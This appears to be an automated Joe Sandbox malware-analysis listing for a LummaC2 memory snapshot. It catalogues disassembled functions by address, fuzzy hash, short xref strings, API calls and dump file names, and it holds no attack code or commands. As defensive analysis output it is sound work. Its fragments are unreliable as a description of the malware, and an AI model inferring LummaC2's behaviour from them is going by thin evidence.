Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 1{$?<$r~$zw
API String ID: 0-614760689
Opcode ID: d2cc898999df6afc1045812f0837b82875c701a19e46824d5cc504eb351f4cc5
Instruction ID: 3d600e037f724a3f54bfd25068414f205284d21f7931d1adc93ebe106ef02121
Opcode Fuzzy Hash: d2cc898999df6afc1045812f0837b82875c701a19e46824d5cc504eb351f4cc5
Instruction Fuzzy Hash: 3802AAB01093C18AD735CF24D4947EFBBE2EBD6354F1889ACC4D99B252C7388646CB96

Function 006CC205 Relevance: 5.5, Strings: 4, Instructions: 508COMMON

Download Yara Rule

Strings

{x, xrefs: 006CC6B5
g`a, xrefs: 006CC864
./, xrefs: 006CC544
|r, xrefs: 006CC5CC

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: ./${x$g`a$|r
API String ID: 0-1262855476
Opcode ID: 53aba7b567a68061f4ab67bcff667bdf39200fe5a4d196fb868d73bf107a4f61
Instruction ID: 9c9307b64e2f8211d0b6436797445f29eb1a75046207e94b815e48344ce20af3
Opcode Fuzzy Hash: 53aba7b567a68061f4ab67bcff667bdf39200fe5a4d196fb868d73bf107a4f61
Instruction Fuzzy Hash: 4AF12A77A5C7105BD308DF6A8C4266FFAE3EBC4314F19C92CE8D89B345DA3886058786

Function 006D59B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

Y\, xrefs: 006D5A5F
/V, xrefs: 006D5A57
U+, xrefs: 006D5A4F
!J, xrefs: 006D5A67

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: 12bbdc9975a3d536ddc4d417bada95fc38d6aefa4990937c2694fdfed4a4d4f7
Instruction ID: 99122534c1ff73ced86bc0229cc47f60a6bc484599f6d6c2fb5e6eab09e72c0a
Opcode Fuzzy Hash: 12bbdc9975a3d536ddc4d417bada95fc38d6aefa4990937c2694fdfed4a4d4f7
Instruction Fuzzy Hash: AFE10FB5608340DFE3249F25E88176BBBF2FB85344F54992DE6D64B3A2D7309806CB52

Function 006BAB20 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

a|}r, xrefs: 006BAC66
nww, xrefs: 006BAD87
tefr, xrefs: 006BADEE
tefr, xrefs: 006BAED7, 006BAF78, 006BAD20, 006BAFAC, 006BAD64, 006BAF81, 006BAEE3

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: a|}r$nww$tefr$tefr
API String ID: 0-1676423017
Opcode ID: 9f8e525e99a8bc6ffd7f5dbb7d1f5f4fe60c284fe27de5105b3a3c8bc0b1bfde
Instruction ID: 1311da7a28f121e33c68c875a5e831ee5b2530218ecac2c3e4a2d702e7e792d7
Opcode Fuzzy Hash: 9f8e525e99a8bc6ffd7f5dbb7d1f5f4fe60c284fe27de5105b3a3c8bc0b1bfde
Instruction Fuzzy Hash: CAC1EFB124C3509BC320EF6488512EBFBE3DB92304F58896CE4D59F342E635C84A8B97

Function 006DC894 Relevance: 5.3, Strings: 4, Instructions: 308COMMON

Download Yara Rule

Strings

^TFW, xrefs: 006DCC43
0, xrefs: 006DCB61
@, xrefs: 006DCBB3
d, xrefs: 006DCACA

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$@$^TFW$d
API String ID: 0-3517422908
Opcode ID: 7d09322b22d7b02172887413e8100442501c64ae02f147de1532921c3c7ad170
Instruction ID: 541c3cc560467803b309b6199915fa67442fbcb72499a161533c26157a0e2451
Opcode Fuzzy Hash: 7d09322b22d7b02172887413e8100442501c64ae02f147de1532921c3c7ad170
Instruction Fuzzy Hash: 4771466060C3828BD318CF3984A137BBFD2AFD6310F28896EE4D68B392D674C506C752

Function 006C64E0 Relevance: 5.2, Strings: 4, Instructions: 238COMMON

Download Yara Rule

Strings

pv, xrefs: 006C6702
gl, xrefs: 006C67E1
tuz, xrefs: 006C670D
L4, xrefs: 006C6570

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gl$pv$tuz$L4
API String ID: 2994545307-2306552461
Opcode ID: 7366fea033b6db57fe19490f4d6cfb9624ab47583ad3e79a80fcc97abc31f17d
Instruction ID: 06d1e850b006adb82b80615def87aa63b243ca975d6b9e7c922ccd78b0846e6e
Opcode Fuzzy Hash: 7366fea033b6db57fe19490f4d6cfb9624ab47583ad3e79a80fcc97abc31f17d
Instruction Fuzzy Hash: 7881DE726083518FDB608F24DC91BBB73E3EBC4314F18893CE5898B2A5EB349946C756

Function 006BD35C Relevance: 5.1, APIs: 2, Strings: 1, Instructions: 625COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 006BD368
CoUninitialize.OLE32 ref: 006BD7A4

Strings

(P, xrefs: 006BD7B2

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID: (P
API String ID: 3861434553-2012212641
Opcode ID: 836d9ee309464f9f64c1defbeae2dea1766f3d87ca3c95540eb4eb36b93b3932
Instruction ID: ac945ac0381c960e2878338668f314c46c7eee3e5522b2539ae1de382bdb77fc
Opcode Fuzzy Hash: 836d9ee309464f9f64c1defbeae2dea1766f3d87ca3c95540eb4eb36b93b3932
Instruction Fuzzy Hash: 5C22FEB154D3C28AD331CF29D4907EABFE2AF96308F188AACC4D95B342D7354546CB92

Function 006EA800 Relevance: 4.4, Strings: 3, Instructions: 638COMMON

Download Yara Rule

Strings

<Y?., xrefs: 006EABDB
f, xrefs: 006EAA31
@Y?., xrefs: 006EAC15

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: <Y?.$@Y?.$f
API String ID: 2994545307-3750340189
Opcode ID: 36871fbebe7edf75a8829f2878bc7182e46452e5be9f0a85cf11be1adc12f0b3
Instruction ID: 33bcb19b2f54188eabbc288ac4ae2c5230200abb7ba419e709113a9fd1bbcbb4
Opcode Fuzzy Hash: 36871fbebe7edf75a8829f2878bc7182e46452e5be9f0a85cf11be1adc12f0b3
Instruction Fuzzy Hash: 0122F57160A3818FD714CF69C89166BBBE3FBD5314F298A2CE49587392D631EC05CB92

Function 006B9710 Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

v~, xrefs: 006B9A04
HVKG, xrefs: 006B97A0
p, xrefs: 006B9936

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: HVKG$p$v~
API String ID: 0-1862922427
Opcode ID: 34a110a72ef7e1ac4cb714a971db04560caf396dbb1f86ae9c52191e4582f5d9
Instruction ID: 5393982edfd791a94c5dc4445deda9e1ca963eaf6177a1c473f55350d24e0f73
Opcode Fuzzy Hash: 34a110a72ef7e1ac4cb714a971db04560caf396dbb1f86ae9c52191e4582f5d9
Instruction Fuzzy Hash: 9DB149B160C3408BE314CF64D8816ABBBE6EFD2314F14496CE1E18B392D778D50ACB66

Function 006DBF45 Relevance: 4.1, Strings: 3, Instructions: 336COMMON

Download Yara Rule

Strings

L,2H, xrefs: 006DBF4D
u, xrefs: 006DC364
@a, xrefs: 006DC2AF

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$L,2H$u
API String ID: 0-2528062038
Opcode ID: bc8080b39eb878269340c4a7419f123280c5ea7f17a0a5f63d1e956f28428d99
Instruction ID: a0e596ced997188912564775d44d08428ad76c918ffeef19986f84675e940fb2
Opcode Fuzzy Hash: bc8080b39eb878269340c4a7419f123280c5ea7f17a0a5f63d1e956f28428d99
Instruction Fuzzy Hash: DD91D07050C3C18FD769CF3984607ABBBE2AFA6314F18499EE0C997382D7358106CB56

Function 006DC984 Relevance: 4.1, Strings: 3, Instructions: 301COMMON

Download Yara Rule

Strings

^TFW, xrefs: 006DCC43
@, xrefs: 006DCBB3
d, xrefs: 006DCACA

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 7b0bbd748507c5c8a6db33ceb1124df787f87757493fdb635a92eed25956ab2d
Instruction ID: 9e30a4e0183b564e1eca649a1a8a4dae7d1c9e76c28f752b30b04bc78312afbe
Opcode Fuzzy Hash: 7b0bbd748507c5c8a6db33ceb1124df787f87757493fdb635a92eed25956ab2d
Instruction Fuzzy Hash: 5071356060C3964BD318CF3984A137BBFD2AFD6314F68896EE4D68B391D674C406CB56

Function 006DC9E9 Relevance: 4.0, Strings: 3, Instructions: 300COMMON

Download Yara Rule

Strings

^TFW, xrefs: 006DCC43
@, xrefs: 006DCBB3
d, xrefs: 006DCACA

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: 5d925a5ba35c9045e10a021d15e11f25703d1ba3e2374b9bd543c43aa655e83b
Instruction ID: 312126055b7d4f2f849175382f7fc8b4d8d60e4bb841a7509dabdcd54e60586a
Opcode Fuzzy Hash: 5d925a5ba35c9045e10a021d15e11f25703d1ba3e2374b9bd543c43aa655e83b
Instruction Fuzzy Hash: A07124A060C3824BD318CF3984A137BBFD2AFD6314F68896EE4D68B391D674C446CB56

Function 006DC9DA Relevance: 4.0, Strings: 3, Instructions: 274COMMON

Download Yara Rule

Strings

^TFW, xrefs: 006DCC43
@, xrefs: 006DCBB3
d, xrefs: 006DCACA

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @$^TFW$d
API String ID: 0-3772873652
Opcode ID: ad83527e737d12ddb8c7b2bc99417ceba5ea2b1b67b3d7c37d17fbdf90b4b8cc
Instruction ID: e1fd058a33dde3ac5717bf5f89fa6fc54c30b8f6dba9c15cce6c61e3416d9259
Opcode Fuzzy Hash: ad83527e737d12ddb8c7b2bc99417ceba5ea2b1b67b3d7c37d17fbdf90b4b8cc
Instruction Fuzzy Hash: 5D6136A150C3924BD318CF3A84A137BBFD29FE7314F58896EE4D68B392D6348506CB56

Function 006D5640 Relevance: 4.0, Strings: 3, Instructions: 267COMMON

Download Yara Rule

Strings

)G, xrefs: 006D58D4
AF, xrefs: 006D58DC
O6E4, xrefs: 006D593D, 006D594C

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: )G$AF$O6E4
API String ID: 0-708911115
Opcode ID: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction ID: fc29386a4bfbc3176239591f58b1f709c3653e8cc2c2780860d0db690ff64b97
Opcode Fuzzy Hash: 8ec6d81a368636483f53a5262d03c7df6d3968ac354951764ba2c7921f2d5c37
Instruction Fuzzy Hash: A48149B1A083508BD7149F14C8913AFBBE2FFD1354F19891DE4C68B391EB798905CB96

Function 006C720B Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

1, xrefs: 006C7631
!, xrefs: 006C78E5

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: !$1
API String ID: 2994545307-1727534169
Opcode ID: f7ecd28ac65aa49bd8b9728d134f98fc5948662a25ed9de3f64361677c357ee4
Instruction ID: ea689b8c3db104f6fa3ee5fad180edfb84d93991b9b1d19478522b13fc84c64c
Opcode Fuzzy Hash: f7ecd28ac65aa49bd8b9728d134f98fc5948662a25ed9de3f64361677c357ee4
Instruction Fuzzy Hash: A722557060C3818FEB248F25D891B7B7BE3EB96314F18996CD4C687252D7359902CF92

Function 006B4C50 Relevance: 3.3, Strings: 2, Instructions: 812COMMON

Download Yara Rule

Strings

0, xrefs: 006B559A
8, xrefs: 006B5592

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: f0a72470b0520ce42d1f3df09eaa6f67f3c44c9a28f48df49696dee2eb2e6602
Instruction ID: 84bca13cb3b4467f309c75ff6cf90ce6806923501a0908929a80ee497bc3dab2
Opcode Fuzzy Hash: f0a72470b0520ce42d1f3df09eaa6f67f3c44c9a28f48df49696dee2eb2e6602
Instruction Fuzzy Hash: F17249B15083419FD714CF18C880BABBBE2BF88354F44892DF98987392D775D999CB92

Function 006CCC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

06i`, xrefs: 006CD13A
46i`, xrefs: 006CD104

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: 84b46289fc9310d2478f2baa503bdc388295dcdaf60d48928e1eb4094f4488c0
Instruction ID: a38b7f749aba2d175948be3b883642c398259fb24cbde0559fb43a5b5ff6b446
Opcode Fuzzy Hash: 84b46289fc9310d2478f2baa503bdc388295dcdaf60d48928e1eb4094f4488c0
Instruction Fuzzy Hash: 1ED11576A143118BC724CF28CC517BBB7E2EFD5320F088A2CE8959B394EB789945C791

Function 006E80C5 Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

NO, xrefs: 006E8378
:, xrefs: 006E85B4

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: :$NO
API String ID: 0-151983983
Opcode ID: 38eb60cd70772670860d64cce7d8f32f2add4b3af6762560bff8e897c7861080
Instruction ID: e592501ecc1fb272c19ad46f4a5a5326af7f285f733fa3052da34bc687d95c20
Opcode Fuzzy Hash: 38eb60cd70772670860d64cce7d8f32f2add4b3af6762560bff8e897c7861080
Instruction Fuzzy Hash: F3D1DF3B229352CBD7189F79DC112AAB3E3FF89351F1A9878D445872A0EB39C964C750

Function 006EE540 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

lohi, xrefs: 006EE624, 006EE6C5
{rsp, xrefs: 006EE750

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: lohi${rsp
API String ID: 2994545307-2839643115
Opcode ID: 2cde85c8555cbdf281f138371a24326abce2eb36788cc12dbcf2744c9d424174
Instruction ID: aeddbb49f16fd2cffab872c0c2f03d8ec5c5896c151c840673b0f02955c399db
Opcode Fuzzy Hash: 2cde85c8555cbdf281f138371a24326abce2eb36788cc12dbcf2744c9d424174
Instruction Fuzzy Hash: 969139716093844FD724DE29D8806ABB7E3EBD5318F29C93CE49A87351DA31ED05CB92

Function 006B4310 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 006B438B
IEND, xrefs: 006B4701

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 72b0dae22d4c1ff62c10dce57b668614eeafc353d259e9d2ee22c1767b8878a5
Instruction ID: e29ae1dcece99681a3fc1fd947914692f82586c4bb937fe9ebb0f32c01af10f4
Opcode Fuzzy Hash: 72b0dae22d4c1ff62c10dce57b668614eeafc353d259e9d2ee22c1767b8878a5
Instruction Fuzzy Hash: FFD1DDB19083449FD720CF18C841B9ABBE5EF94304F14492DF9999B382DB75E988CB96

Function 006C7B75 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

"#, xrefs: 006C7D10
s}, xrefs: 006C7C34

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: "#$s}
API String ID: 0-1697270657
Opcode ID: 5a06d1cd6260e25a551da0a89e7c291fa8fcb4d9412545201e13f43d9afdaf5d
Instruction ID: d35a71a40f1a2d134dced80953bf4c0eff546470e3ee16d6fdddf75260d67316
Opcode Fuzzy Hash: 5a06d1cd6260e25a551da0a89e7c291fa8fcb4d9412545201e13f43d9afdaf5d
Instruction Fuzzy Hash: 00B167B01183818BD7758F28C4917EBBBE2EFD6314F14496CE4CA8B391EB758945CB92

